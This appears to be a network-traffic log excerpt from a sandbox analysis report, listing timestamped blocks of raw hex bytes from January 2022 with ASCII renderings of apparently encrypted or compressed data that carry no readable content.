                                                                                                                                                                                                    2022-01-14 03:59:52 UTC5022INData Raw: c1 20 06 a0 0a 72 71 cb 36 83 e2 2c 2c 17 b3 f0 2c 4a d6 88 5a da af 28 de 0c 5d 66 52 d6 05 fe ba 1a 48 c2 cd 6a ef eb bf 74 34 fe a5 9a 5e a8 c3 49 43 a6 04 77 9e e9 0d 61 51 fb fc 95 72 9a ff a0 1c d1 6b 21 b4 b0 fb 09 91 e8 c6 82 7c 82 5d b7 47 2b e8 3c 01 5f 73 15 f8 24 66 d2 1e 73 46 31 38 e1 d8 d2 4b db 8a 9e 35 54 a2 78 5a e3 dc 20 e4 3e 84 c4 c5 68 f9 08 6a 23 72 13 d2 27 b0 e1 b3 26 9f e4 7a be 0c 6d 86 a3 9e f7 c3 48 75 9e 1f ef dd 85 12 57 aa 8c 1a b9 7c 66 d3 6c 2e 9a d2 91 4a 82 9f 45 ca 6d 08 80 c0 8f b5 3f e1 79 e0 d9 03 ee 3e f1 62 47 45 89 53 81 20 73 d5 94 3f 05 4f 6a dc 32 9a b6 05 66 2b ea a6 88 b4 2e 38 31 71 46 84 10 72 50 5c 35 e0 30 30 09 89 8a 40 22 20 de 58 e3 1a 7f 1f 1c 54 84 30 cf 26 f8 90 d9 1f 87 40 ef a1 a6 f5 1d 12 e6 07
                                                                                                                                                                                                    Data Ascii: rq6,,,JZ(]fRHjt4^ICwaQrk!|]G+<_s$fsF18K5TxZ >hj#r'&zmHuW|fl.JEm?y>bGES s?Oj2f+.81qFrP\500@" XT0&@
                                                                                                                                                                                                    2022-01-14 03:59:52 UTC5038INData Raw: 1d 8f b3 e6 f1 07 ed 93 2f 18 93 2e c0 ed 4c 3e e3 e1 6d af c0 c3 ff 48 58 55 52 e4 70 f9 bf 58 28 56 56 04 95 6a fb 57 96 73 bc 32 d7 a3 58 f4 b3 9c bb 8d 5e 09 71 17 12 ce aa 2c ba fd 3e a9 87 8a 52 4d 54 96 ed 2a 90 ab ec ff 79 1d 21 f9 7d 3b 34 28 a8 35 b1 d9 a4 da 3c f9 6e 4a 1e 6c fb 34 bc 74 0d 9f 57 1c b6 73 74 1f 3a c8 5e e6 b3 aa 3d 48 c4 12 59 98 6e 87 66 26 39 ea f2 8b 8a d9 72 fd 30 c1 ff 8b ed fd c5 10 4b ed f0 58 98 c9 5d 4c 64 29 04 5d 82 f3 ff 80 d0 f4 b6 36 98 b0 c1 df 6e fe 48 44 e2 06 c4 d0 ba c5 6f 8a ca fd cc 11 e3 f3 63 1f 12 a2 a5 d1 ec 64 e9 bb 59 df a4 41 f3 38 63 f1 5e 56 9d 9f c3 32 5f a8 74 5e b0 e7 16 02 02 02 a8 a6 71 bb 8a 2f 57 2e dc a3 e5 06 d3 a6 2e 57 31 6b d8 77 45 91 3e 55 96 96 a8 86 e7 63 40 2f ec 3a 6f f1 7a e2 8a
                                                                                                                                                                                                    Data Ascii: /.L>mHXURpX(VVjWs2X^q,>RMT*y!};4(5<nJl4tWst:^=HYnf&9r0KX]Ld)]6nHDocdYA8c^V2_t^q/W..W1kwE>Uc@/:oz
                                                                                                                                                                                                    2022-01-14 03:59:52 UTC5054INData Raw: 9c 86 e2 6a b3 ba e6 3d 72 3d 63 62 ff 6c f5 57 86 59 a4 d0 6c 9b ad e9 52 3a 0b 0d 59 cc bd d6 45 27 2b 4b dd 5f ce 5a 45 ea 97 03 c7 5b 89 e3 de ca 62 db 96 b3 8c 3a f6 08 36 a4 11 5b 84 46 11 99 9d ee 4a 2e e6 d9 79 36 96 c6 8b b3 da 2a 02 66 6f 9e 6e a4 f7 f4 00 d7 5c ed e3 04 94 52 46 02 e9 b0 6f 2e 49 92 8e 6b b2 b9 42 9a 2d b8 96 65 5a 51 5f 0d 8c 94 05 d6 27 77 30 43 4d f3 51 f4 c5 e9 39 11 90 5e 72 cd e5 f5 49 95 9a c5 18 d7 93 ab a0 ce cf d0 71 d5 12 82 5a b3 52 de 43 62 bf 78 8e cb 74 b1 3c 08 f4 34 2a 6c 94 45 d9 6d d8 95 51 cc 0b fc e9 78 62 01 4c 9d cf 1c 7c e3 dd 74 cc 6b 76 37 4d 4c 1c 3b 90 8f 84 e1 d2 ab 8f 81 fa 19 52 8f 2f 1a d8 36 cb af fa cd 96 20 99 3f fc f1 fa 1c e8 a1 51 b5 4e bc 3f 36 9b 91 4d 1a b0 3d 96 b2 9a 26 fa a5 19 8d a7
                                                                                                                                                                                                    Data Ascii: j=r=cblWYlR:YE'+K_ZE[b:6[FJ.y6*fon\RFo.IkB-eZQ_'w0CMQ9^rIqZRCbxt<4*lEmQxbL|tkv7ML;R/6 ?QN?6M=&
                                                                                                                                                                                                    2022-01-14 03:59:52 UTC5070INData Raw: 0a f9 15 ac f0 8c fb 16 a0 0a fc 4c 5b 8e 12 53 e0 d7 48 b6 68 85 15 67 de 7b 52 79 18 e9 cd ca 4e dc 85 a7 2c 6c 01 af 15 0a 43 8c a6 38 23 b0 53 80 1f 8e 2a 55 40 de cf 37 ba 60 53 b6 26 2b c3 ef 9e 86 86 d8 70 4b 70 72 ac ec 30 99 08 36 c9 fc 5d a2 20 76 40 da d9 b2 9d 61 f6 65 39 4a 22 d4 f0 f0 67 89 24 db 2a 39 da 21 e4 fb 5e 60 74 d1 06 6c fd 7a 25 f9 48 7c 90 50 64 6b e5 0a 70 0d 87 79 73 68 43 b8 0e c2 2f 1e 66 d4 7b db 00 1b 50 79 33 6f 35 74 d1 c5 d7 24 86 03 11 04 8d aa b7 dc fa 4e cb 71 a6 b5 d1 f0 34 57 b5 18 73 ad e4 38 96 8b 11 93 5e d0 f2 d5 6a 2c d3 98 ce 18 86 e3 ac 8f f1 eb af 20 6b 04 aa be 37 7b 03 de b9 13 44 ad b0 68 01 6d 8d bf 68 d5 6a 06 2e e8 77 06 52 75 17 88 cd 53 4b 18 8b 99 b1 43 27 63 a7 f8 56 6c 85 75 be f4 e4 0e ca 55 c1
                                                                                                                                                                                                    Data Ascii: L[SHhg{RyN,lC8#S*U@7`S&+pKpr06] v@ae9J"g$*9!^`tlz%H|PdkpyshC/f{Py3o5t$Nq4Ws8^j, k7{Dhmhj.wRuSKC'cVluU
                                                                                                                                                                                                    2022-01-14 03:59:52 UTC5086INData Raw: 25 cf 22 01 35 f7 6f 8e fe 92 4f f7 6e b4 fe 62 da 89 f3 b0 79 0d 27 d4 49 a6 e3 45 6b 20 e9 1e fc 7e d3 ff a0 a3 5a c7 d7 b5 2d 32 d9 b0 7f 37 ae b4 51 6a 19 1a aa 30 59 cb e8 fd 9a 9e 00 8a f1 63 08 84 a9 f1 53 d1 a7 77 4f 80 7e ae 8a 13 87 c1 a0 a2 a1 a1 62 40 87 d9 31 00 1b ba b7 3a 16 bd 0a 0a 16 5d 97 16 3e 8f 07 bf ed 3d bf 4f 4a 04 a4 84 bf 42 b2 87 d9 91 19 99 4e 4f d3 e5 a5 e5 4e 36 b1 50 04 82 0e 08 99 35 12 ca 8b 3e 16 f3 82 7e 62 8e 08 61 48 df 61 99 c7 15 06 0f 82 8e 82 d0 92 9f e3 3d 99 4f b3 ff 64 8a ab 62 cb 97 5d a3 97 38 03 8b a7 95 23 3f c2 26 3c 57 36 3a 9c 0d e0 9c 87 52 ed 80 19 b9 e9 1b 63 ed 41 90 f0 db 75 67 bc 28 d2 f1 f0 a5 7c aa bc b2 88 88 59 75 11 8d 21 65 2f 24 d0 f7 d6 01 d8 da e9 2b 5a bd 02 47 48 e4 98 ca 35 58 f8 2a 27
                                                                                                                                                                                                    Data Ascii: %"5oOnby'IEk ~Z-27Qj0YcSwO~b@1:]>=OJBNON6P5>~baHa=Odb]8#?&<W6:RcAug(|Yu!e/$+ZGH5X*'
                                                                                                                                                                                                    2022-01-14 03:59:52 UTC5102INData Raw: 69 f5 ce 0d 0a e3 b7 5c cf b5 c7 f6 3c 06 a0 7c ec 69 1a 0a 9f e0 7c a3 c7 71 9f 59 dd 33 35 f8 6f 8b 12 1a c3 3a dd 15 dd f8 2d 3f 79 6a 22 ad 13 6d 00 9e 3b e1 62 e5 85 49 24 35 3f 40 f6 a8 f7 1c 93 ca 71 48 8c 9c dd 53 11 a3 04 81 be 5a 37 2d 89 c8 50 7d 5a 2f 65 8d f9 a7 cb a0 7b 47 1b 94 b1 59 39 da 11 f4 c1 cc e6 60 d2 e4 a1 4b 5f 58 69 a8 01 9b 95 56 8a 05 bc 97 83 16 28 e5 21 62 27 38 ce 9b 7e 7b c2 9a 1d 16 71 6b 76 b8 66 38 87 2a 3c 00 72 66 e9 1d 56 83 21 19 af 0f a2 d0 c9 0a 62 dd e6 51 a3 ca 40 aa 8b 67 b9 a2 3e 3c cc 3e 2e fe 39 11 13 99 76 91 90 4b b8 d6 13 36 a7 0b d0 a7 48 c9 9b 8a c9 6c 50 e1 20 2f 1e 0a 3f 3a 86 e3 a8 2e 86 a4 69 b1 7e cb 31 a6 c0 f5 bb 63 0e 11 36 4e 02 31 6d 97 21 37 01 12 81 ff 2c 1e d7 78 97 39 74 c4 45 d8 d8 b9 ac
                                                                                                                                                                                                    Data Ascii: i\<|i|qY35o:-?yj"m;bI$5?@qHSZ7-P}Z/e{GY9`K_XiV(!b'8~{qkvf8*<rfV!bQ@g><>.9vK6HlP /?:.i~1c6N1m!7,x9tE
                                                                                                                                                                                                    2022-01-14 03:59:52 UTC5118INData Raw: 8d 3b 5a 3f 43 aa 9e 23 d4 c8 a3 0d 44 2b f9 75 d4 55 a5 15 e1 13 4d c6 3f 8e f5 5c f7 83 7b a3 eb ea 12 b8 d8 d5 12 a9 43 68 d6 bd 85 a9 7d 7e e6 21 c3 32 1b f8 d9 30 fe 4e c4 e2 f1 2f a1 e1 99 b0 50 00 1c 7f 17 a6 16 1e d2 b7 17 e3 aa ec 13 64 c4 22 f7 30 89 b8 7b 36 d6 b0 2a 2f e8 1c a4 25 e8 43 2e 2f ba 18 c9 1b 84 7e 96 4a 41 61 6e 19 17 b0 e7 cd 28 ab 4e 74 af 7a ae 55 37 03 76 c1 90 6b 8a 3f 77 d0 a1 2c d4 18 af 8c 3b 3d c7 b5 f4 bd 54 bb 01 9a 89 e3 1d 80 17 5c 73 9d 4a 43 bc 34 6f 3a b5 ca 5d 14 f5 40 97 d0 e7 9f f7 94 0a 82 35 fa 8b df 47 82 82 94 54 cf 4e a1 44 e6 2d 0b b7 9f d3 98 d2 1c 64 9e 2c e6 7d eb fd e9 ca eb a3 04 a4 61 36 8d 50 65 12 b4 13 0f 8c 88 dc f5 87 82 c3 ac db 47 33 fe f6 0b 59 01 df 94 8c 33 c7 50 65 4c bb 43 62 0e 2f c4 ef
                                                                                                                                                                                                    Data Ascii: ;Z?C#D+uUM?\{Ch}~!20N/Pd"0{6*/%C./~JAan(NtzU7vk?w,;=T\sJC4o:]@5GTND-d,}a6PeG3Y3PeLCb/
                                                                                                                                                                                                    2022-01-14 03:59:52 UTC5134INData Raw: 01 f5 c4 2f a9 0b 7d 62 13 c7 9b ae 22 f1 c4 aa fe c7 39 cb 3d 81 f2 54 60 a5 5a 85 cd 6c 20 7c 51 0c 08 95 02 1d fd 63 f5 e1 1f bf e7 d9 56 42 49 8b 64 d8 5b c2 52 43 dc 58 95 e1 12 7d 88 9c d1 37 9f 8b 66 bf c7 5c 65 5d 8e 78 47 bf 31 d9 55 46 b8 13 80 24 71 c8 95 e9 4b 5c 39 7b 18 3b 32 82 cd 90 a7 71 bc 22 de 86 1d 0d 78 74 ba 4e 8b 1b a2 36 82 58 d2 60 0c 86 7b 4e f5 73 d4 a9 99 28 9d 42 3a 35 a0 45 b5 0e 50 ac 46 8e 37 70 94 af f9 0d ba 70 5d 39 08 a3 a0 2d 71 ff 2c a7 23 04 56 80 ee 7d 90 c1 ab b6 1c c9 6a 64 b1 14 91 d4 fe 17 f9 e3 b2 c5 10 50 bc 2e 47 40 21 f7 19 3d ed fe d8 59 ae f0 ab e8 ab c9 ec ae e1 29 f8 4a 9a 18 87 b7 9b f1 d5 36 65 4b 4e e3 41 f6 5d 79 51 bc 6e 9e a1 ce f8 d8 0b 77 4b a3 bc 3e 18 71 be 34 63 5a eb db 74 43 6b 78 21 dc 97
                                                                                                                                                                                                    Data Ascii: /}b"9=T`Zl |QcVBId[RCX}7f\e]xG1UF$qK\9{;2q"xtN6X`{Ns(B:5EPF7pp]9-q,#V}jdP.G@!=Y)J6eKNA]yQnwK>q4cZtCkx!
                                                                                                                                                                                                    2022-01-14 03:59:52 UTC5150INData Raw: 48 0b b6 ed c0 b9 a3 df fa 38 a3 fc ec 4e a7 8d 8d b4 ac b2 b7 be 60 9d a6 64 0a f3 0c 47 dd f5 d5 d2 ea 52 ad 16 d9 c4 65 e2 77 25 a2 65 e7 e5 46 bf 6c 94 e2 4b c8 04 ed cd a4 36 73 81 7f d7 ec b4 5d 04 2d 81 50 a0 b9 af d9 30 66 76 49 37 2e 5e 00 91 57 67 29 48 bb d8 c6 c1 c2 6c 0e 82 6a 92 8b 74 5e 2d a5 c6 56 b9 f9 1e b5 d0 f1 12 97 3c 2b 2a 06 c5 61 12 50 f9 e6 24 3c d2 ec 52 f3 bb 45 66 5b 1e e1 ca 7f a5 df b3 9e 53 5e 8a d3 25 3b ba 0a a0 10 ee ef ad c3 e7 43 6f 90 ca a8 23 4c b1 9f be 21 68 b3 84 32 17 8c 74 6e 82 c9 c9 75 ee 98 28 03 a4 71 01 01 6b bd 0c 65 8f 82 0c 3a 32 b3 33 96 39 1f 07 42 28 ed 00 19 cc 52 44 47 fa e7 ca 68 ab 0c 0e 2c 68 55 d5 c9 b8 75 c0 c3 ef 58 7e 3c c4 17 eb 8e 01 e4 03 97 fb 10 aa cc 7d a0 60 8e de 34 e2 e0 2f be 0f fb
                                                                                                                                                                                                    Data Ascii: H8N`dGRew%eFlK6s]-P0fvI7.^Wg)Hljt^-V<+*aP$<REf[S^%;Co#L!h2tnu(qke:239B(RDGh,hUuX~<}`4/
                                                                                                                                                                                                    2022-01-14 03:59:52 UTC5166INData Raw: 2f 63 0e c0 2d 6d 23 60 1f 42 12 a0 70 22 3e 6a 6e e5 d5 e9 40 97 d8 47 07 05 80 69 d4 94 46 1a 34 88 9e 24 86 ee e8 7a 06 06 37 8e 34 da 15 98 57 f8 54 dc 8a a1 da b9 c7 f2 29 b1 9d 1f 1b 0e dd 5a 69 f2 d1 0c 95 f0 4c 41 39 ce f0 a9 ba ed f9 ed db 24 c1 d0 b0 21 2b 8c 80 bb a0 21 b6 19 e7 4d 2a 2f 84 be f9 f3 54 b4 f6 b7 11 82 26 40 c8 70 fc 78 c2 27 96 dd 2f 84 39 9d 27 ad 45 f9 d9 44 95 c6 1e eb 39 69 ec 1a 4c 54 7c 2f b9 3c e8 99 2c f5 b1 35 78 f9 2f e4 df 1d 0f ab 1e 22 95 9a 9d 43 f4 4d d3 5b b9 f6 f8 f9 6b 8a f9 04 39 45 4a f1 5a 3b c3 96 16 d9 fd bd a1 e8 8b 98 c0 ad 60 be 54 94 e7 f7 f4 da cc 4c a5 f3 40 da 95 32 2b 83 9f 24 68 cf 0d 53 62 6e 55 a6 6b bd b8 38 23 a3 6e 82 c8 f7 2d 3c e7 8c ac ae a8 e5 46 bb 23 a3 ab 9c b3 74 37 51 00 45 f6 95 d1
                                                                                                                                                                                                    Data Ascii: /c-m#`Bp">jn@GiF4$z74WT)ZiLA9$!+!M*/T&@px'/9'ED9iLT|/<,5x/"CM[k9EJZ;`TL@2+$hSbnUk8#n-<F#t7QE
                                                                                                                                                                                                    2022-01-14 03:59:52 UTC5182INData Raw: 19 cd a6 cd 24 4f 0e 25 23 bd 09 f7 fa e7 20 64 93 03 1c cf dd a5 6c 19 54 33 8a 18 56 90 90 68 40 87 c9 84 87 cc ba 8f aa 77 b3 31 1c d4 7b 1e af 5b 5b e6 9a 3c 32 8d fe 61 e0 a9 a9 00 48 32 ec 39 90 5b 9e 2a 8a 93 9d 83 42 52 de 50 f3 2b 09 1f ef 1a f6 c5 d5 35 f6 dc 7a 62 ab 01 22 95 66 cf de fb c1 a2 d9 b8 f1 2e c0 be 30 82 6a 1a 98 11 fa dd 9c d1 70 2f 06 0a 1d 40 1e 88 3f 07 7d e5 e9 97 5e aa 93 de 43 06 8d 47 73 19 36 84 1c ad ba b9 99 20 95 33 73 af 66 8f ee 53 84 a8 77 43 05 e2 4b 15 11 ec c1 fb b0 25 ce 2e 3f 01 aa c0 d4 42 cd 9b 1c cd 42 39 8b bb 50 5f a5 c7 9a 2e b3 44 db 6f b5 d6 f8 df 47 75 71 5a 43 d7 06 fe d6 39 b4 22 78 69 82 37 60 08 bf 32 b3 10 ce 8f fe 18 1a 6b 72 6a 27 93 a4 9c fc 63 2d bf 0b 63 7a a6 f5 f3 2c 69 14 3f 5c d9 cd 6d 9e
                                                                                                                                                                                                    Data Ascii: $O%# dlT3Vh@w1{[[<2aH29[*BRP+5zb"f.0jp/@?}^CGs6 3sfSwCK%.?BB9P_.DoGuqZC9"xi7`2krj'c-cz,i?\m
                                                                                                                                                                                                    2022-01-14 03:59:52 UTC5198INData Raw: 19 80 41 93 fe ef 01 76 4d 0c 0f 07 da 3c b9 8d 40 b2 22 79 3b 43 7b 1f 59 2d cc 4a 7c a7 bc 5b 98 62 6b 21 8c cd a0 89 ad e5 33 ab 97 90 5d 35 b5 3f 2b a9 46 f2 60 46 37 45 b4 45 d6 7e d2 6e c3 bf 58 68 20 f1 04 01 fe 14 fb 4c 1e 07 c9 fc 57 f0 df 38 ed ef 2a c9 7c 47 70 86 ab 35 b8 25 51 05 74 4b e8 9f f6 e1 69 c8 68 cc da aa c0 13 c7 ac 01 9b 23 9a 9b 38 37 4a e2 08 77 00 96 31 52 8d 40 e5 53 44 d1 5c 8e 27 15 b6 fd 1f ec 2d 8d 5e e6 95 7a e8 af a0 fd 26 a4 b3 f0 ed 88 47 be 8e a0 5e 16 d2 37 ba 56 10 44 8c 5f 4f 23 15 e0 a6 bb 6a b2 d6 2f dc 44 59 05 aa 98 43 83 de 92 1c c2 c9 e0 8c fb be f1 10 e8 e7 9e 53 9d 45 7c 15 47 bb 18 d4 e2 3d d7 f3 8f 37 d0 60 27 de c1 57 b2 b6 9b 86 b2 6c ac 6d fa 2a 62 65 3c e5 49 2c 48 47 ed 9c 41 c7 68 68 26 f1 6d 6d a6
                                                                                                                                                                                                    Data Ascii: AvM<@"y;C{Y-J|[bk!3]5?+F`F7EE~nXh LW8*|Gp5%QtKih#87Jw1R@SD\'-^z&G^7VD_O#j/DYCSE|G=7`'Wlm*be<I,HGAhh&mm
                                                                                                                                                                                                    2022-01-14 03:59:52 UTC5214INData Raw: 64 41 f5 ff b3 01 bd f8 7e 9f 68 2e 78 b9 fa 54 d8 7c ca cf 72 aa 86 80 32 03 b1 4d 67 02 f5 da cb f9 c3 2d 69 75 13 d1 d4 34 8e 8a f2 27 37 79 8a e0 c1 e2 c4 7d 33 7d 78 d2 5a 33 b4 de f4 94 e0 e7 f5 83 22 26 48 20 04 9d 9c a2 70 63 39 33 99 39 0c c3 a3 ba 27 7f 04 8d d7 07 8d 3f 7b 83 1f 8c 2d f5 f4 36 54 19 b3 95 ed 22 08 7a 67 9d 62 5e a0 20 b4 cd 7d 18 e6 c7 12 76 3f f6 2d 57 68 b2 d4 7f d0 01 06 c0 a4 86 3b 59 08 9f 32 f1 3b b2 4f 6a 8b f7 71 42 9a bd b0 86 cb a1 3c f2 de bc 85 72 06 35 94 2e b4 81 43 da 31 21 d1 d6 6e 00 a2 58 68 c4 be bc 44 6d 38 1d 86 d5 61 65 3d 28 b8 73 d7 76 36 03 36 ba aa be 91 18 15 f6 7a 9c f5 53 47 18 d1 a3 41 cc 2c 8f d1 76 51 44 ec 66 2e 38 fe f7 bc 71 b6 0c 46 7d 5c f5 d0 12 8b 52 5c 18 cb 1b 44 fe 07 86 58 d1 6c 45 6e
                                                                                                                                                                                                    Data Ascii: dA~h.xT|r2Mg-iu4'7y}3}xZ3"&H pc939'?{-6T"zgb^ }v?-Wh;Y2;OjqB<r5.C1!nXhDm8ae=(sv66zSGA,vQDf.8qF}\R\DXlEn
                                                                                                                                                                                                    2022-01-14 03:59:52 UTC5230INData Raw: a8 48 7d 32 b8 3c fd ec 88 36 66 31 eb 08 7d 07 8d 7c aa 3b 70 0a 11 3c 37 f3 a0 c6 c9 1e df a1 5b 30 26 2c 76 b0 28 7b 78 3a 4f f1 fb 85 65 ed 0e 09 1d c2 01 dd 0b a7 33 27 5c ee e6 bd 98 40 5a 5b 4a 6a 8a 55 b4 7f 04 7b 44 d9 0d 80 57 b4 f3 7a dd 50 fe b5 fd 4b 10 92 d4 05 7a 03 ad 09 7b 99 c0 d9 b8 99 64 b3 88 cb 1e 02 19 d2 f4 10 88 40 93 b9 fb ab e1 50 4f bd 83 cb d8 68 43 31 3b f6 65 00 78 73 47 ae 7c 24 aa fe 7a 31 b5 bf 3b 73 95 ae 85 21 1c 56 4d fb 9b 26 1f 01 78 bc 41 e2 be e3 a5 61 b2 d8 f7 d1 ab 23 bc af 9a 9e 91 c1 91 c8 8f 22 c6 51 6e 17 9c de 04 e8 75 92 01 f4 9f 71 e3 69 9b 43 3e eb fa 8f b0 26 58 96 ac f6 7c 91 aa 88 31 5e 8d cb 64 65 b0 b5 ce b4 b2 ae 99 f1 93 c7 06 62 97 c7 71 c7 fc 53 0d 2f 9b d8 24 81 9a 21 8d 5d 8b 4d 58 ad 41 ea cc
                                                                                                                                                                                                    Data Ascii: H}2<6f1}|;p<7[0&,v({x:Oe3'\@Z[JjU{DWzPKz{d@POhC1;exsG|$z1;s!VM&xAa#"QnuqiC>&X|1^debqS/$!]MXA
                                                                                                                                                                                                    2022-01-14 03:59:52 UTC5246INData Raw: 60 69 7a d8 cd 0d bb 8a 6b 35 a8 70 86 7f b9 af d9 20 de f6 0b 55 be dd 60 c4 45 5f 05 10 fb d3 30 b6 3e 79 9a 63 3e 1e d2 3b d3 f7 8e ae d9 d5 05 39 d4 4c 13 89 16 84 bc 8e 86 d6 26 dd 43 70 0b d8 bd 13 11 5e ef 56 1c 47 bc d7 dd 8a e1 0b de 8b 2d d6 35 c0 ad 8e d5 6d 67 1d 49 24 a7 6b 42 71 32 fd bd 57 0c 03 42 50 df 60 45 65 72 ff 7b c7 35 ec 16 59 a8 23 f7 42 da 54 62 af 58 d2 50 98 92 8c a9 72 86 e4 fa 7b 16 81 33 d4 2c 43 ef 4b c4 bd 70 3e 07 0d 76 dd 41 03 4f ab 69 c0 ed a9 47 9c 11 05 a4 f2 f3 86 1c de 7a d3 50 7b f7 41 94 dc 60 66 b2 04 fa 3f e4 b0 9f 90 07 92 0c 1c 22 e3 c4 f4 98 81 cb 61 6a e6 4c ab 8c 69 b0 a9 a2 02 d9 30 99 5d a9 85 6e fa be fc 2f a9 a9 6e a8 44 fd b2 02 b9 11 36 0b 4f 37 f3 2c 4e ca f6 18 5b 45 32 9a dd e9 bb 2d d8 53 f6 ce
                                                                                                                                                                                                    Data Ascii: `izk5p U`E_0>yc>;9L&Cp^VG-5mgI$kBq2WBP`Eer{5Y#BTbXPr{3,CKp>vAOiGzP{A`f?"ajLi0]n/nD6O7,N[E2-S
                                                                                                                                                                                                    2022-01-14 03:59:52 UTC5262INData Raw: 23 05 6f d2 41 c6 04 f7 36 c9 4a 2d 0d 05 38 ac c5 ed fa 49 85 9d 35 c3 51 91 20 78 5d 08 62 a0 b1 cb f1 1a d0 06 b7 74 9b 63 cb 39 ab c7 f2 de fa 17 c0 77 df ca 24 c7 12 e0 01 5e c8 66 e3 ea ea 75 cd 4a 38 b0 87 1f b9 e7 98 b4 d6 da bd fa ab e5 f3 c9 3e 36 0c 82 a0 66 70 de 10 90 6f ad 80 6e 06 10 ed 6f 33 b0 16 cd 0e 05 93 c9 98 9f 67 8e 34 bd 2b 1f ec 39 5a 7e 77 10 62 b6 9d 0f 79 43 9c 17 98 c4 76 7a 47 e5 bd ca 1f 37 71 7e f7 93 be 74 cb 4d d2 6c bb ca a7 8e b8 b5 8d 93 fd 4e 95 ae 1a c2 ba d9 e7 0c 31 3e 8f 64 89 89 5f 7c 8e 60 44 65 db 3a 69 10 61 18 e4 ae f6 3e 6e cf 24 5e 25 17 c5 d5 a9 a2 ae d5 b2 00 93 f8 3a 9f 10 63 5e f3 2b 78 1f 1d ed 82 05 f2 47 9c ed 7b 3f 09 05 ad cc c2 5a da 02 ed ff 6b d0 83 ca 86 b0 a7 ee c5 6c 55 55 c7 35 3d 5b be 92
                                                                                                                                                                                                    Data Ascii: #oA6J-8I5Q x]btc9w$^fuJ8>6fpono3g4+9Z~wbyCvzG7q~tMlN1>d_|`De:ia>n$^%:c^+xG{?ZklUU5=[
                                                                                                                                                                                                    2022-01-14 03:59:52 UTC5278INData Raw: 9e 5c 69 97 4a a9 3c 43 43 95 bd f3 6f b7 2f 1f 74 2e 9d c8 4a 25 84 9e df b6 bf 08 80 bc 6f 68 a9 b9 72 6e 22 d0 8f a9 84 f1 20 3d 40 e4 b6 54 f2 e1 1f 91 30 df e4 d1 e3 90 88 c9 bc 37 ea 3f 8b 68 ca 95 af 19 fc 5c 5e 54 99 45 36 8c 6a 54 62 27 d6 92 2d 7c 1e 1a 4b 74 b1 fa eb f4 23 1d 06 3f ee 37 46 6b f4 86 77 b7 cb ad cf fe 44 5c 90 14 8f 0d 23 43 57 60 8a 40 7f 4c 6b 97 d3 48 32 0a b9 f8 6e 89 e2 73 f7 ee e8 a9 3d 8a 4b da f7 4f 99 48 53 0a e3 6d d5 c2 f7 ce 38 80 5b df aa a4 89 68 9d 06 2c 33 9d 23 50 7e fa 57 54 da ab bd 37 44 ec ba 86 b0 d4 27 07 b4 ae 4f eb b2 31 53 51 66 5c 39 30 26 82 4d 7c b8 ea 1f 14 d3 32 2e f8 fc 52 a1 44 6d c9 14 ab 4d 10 28 b7 b2 21 b5 3c f8 e9 2a 1c 7c e4 a4 cc 8d 0d 00 85 2b 66 87 a0 14 42 a2 4d 4a 78 07 e6 9a ee 42 3e
                                                                                                                                                                                                    Data Ascii: \iJ<CCo/t.J%ohrn" =@T07?h\^TE6jTb'-|Kt#?7FkwD\#CW`@LkH2ns=KOHSm8[h,3#P~WT7D'O1SQf\90&M|2.RDmM(!<*|+fBMJxB>
                                                                                                                                                                                                    2022-01-14 03:59:52 UTC5294INData Raw: 0c da e4 ba 6f 34 82 61 a5 58 fd 9b bf 6a 26 ec ff 5a f2 18 61 8c a7 5f 49 bd 70 95 ce 91 9d 85 df ea 56 d3 00 4e 3c 59 33 bb 15 3b f4 91 53 d3 e1 90 8a ba 50 f0 b7 4e d0 ff 8c 5b 4d 38 63 53 a9 0e 6c 5a cc 4f c5 bb 0b 39 4d 17 4c 38 ba 61 bd 48 bf 72 d2 5d 68 b1 09 3c 5a 71 3c 4e 9a 4d 5e e1 86 cf 12 5b 03 a6 41 e1 0e de 9c 2f 7e 89 3c 58 be 67 85 9c 2d 48 1f 31 98 0d 00 df 83 6c e6 1f 6c c9 ee 88 f3 b9 d7 a0 40 62 b2 79 b5 5c 51 bf cc 75 56 2d aa fa 5d ce 2c d7 b6 b4 54 31 85 3b 96 e7 33 93 d3 df 69 fe 30 5e f6 d8 98 31 79 78 f6 fe 30 40 9e 05 c3 a6 fc fd 2a 2c 35 80 a2 53 19 b5 39 34 9c 98 fb 23 58 5e ae f3 c9 11 96 da bd 2f b2 17 ce 46 ac a8 54 bc 11 38 cb a8 59 6e 97 85 d3 e2 9d 3b d0 d0 24 3f 5d 18 d7 9c 3e 41 15 dc 82 b7 31 b4 47 d1 f9 3e a7 a0 a1
                                                                                                                                                                                                    Data Ascii: o4aXj&Za_IpVN<Y3;SPN[M8cSlZO9ML8aHr]h<Zq<NM^[A/~<Xg-H1ll@by\QuV-],T1;3i0^1yx0@*,5S94#X^/FT8Yn;$?]>A1G>
                                                                                                                                                                                                    2022-01-14 03:59:52 UTC5310INData Raw: 8b 2d 07 af ad ca 6a 56 e8 de 24 62 78 75 3e 76 fa 77 8e 29 58 0d 78 1c 94 8d 1f 02 4f e2 d2 c4 16 20 4e 9f 89 44 85 f2 3b 23 f6 3c 29 a5 db b4 e7 95 91 dc 66 50 47 c2 bc d7 0f aa 4c 1f 97 cb 71 bf 21 b1 00 f5 44 a6 b8 e5 65 a7 23 ec e2 26 8f c0 e6 cb 08 9f c8 a6 5d 3f 25 ce 05 47 57 2b 2f 24 6e 9a 8f 14 2d df 1d 72 d8 71 95 94 44 e4 c5 db 85 07 b8 1f 53 87 6c 8c 95 d5 24 17 32 78 1e fd be 58 1e af aa 8f 95 c7 92 49 4f a0 b3 9d 5f 4f 63 d3 6f 23 8e 94 44 23 62 1b 67 7b 6c 0a f9 99 b1 84 7b 41 97 cc 39 6d 49 c1 45 5b 32 aa b5 3c e5 8f 0d ed 13 90 95 c2 07 96 30 f3 22 0b c6 92 56 17 6b c6 ed d3 27 e2 53 46 90 8a fc 6a e6 11 8f b4 b2 83 9d 33 49 a5 6c ee e1 f6 15 be 5b 0a 75 77 58 48 09 89 7c a8 57 60 fe bd d1 5c 90 9a 6b fa 79 89 60 e9 67 70 41 36 0b 88 86
                                                                                                                                                                                                    Data Ascii: -jV$bxu>vw)XxO ND;#<)fPGLq!De#&]?%GW+/$n-rqDSl$2xXIO_Oco#D#bg{l{A9mIE[2<0"Vk'SFj3Il[uwXH|W`\ky`gpA6
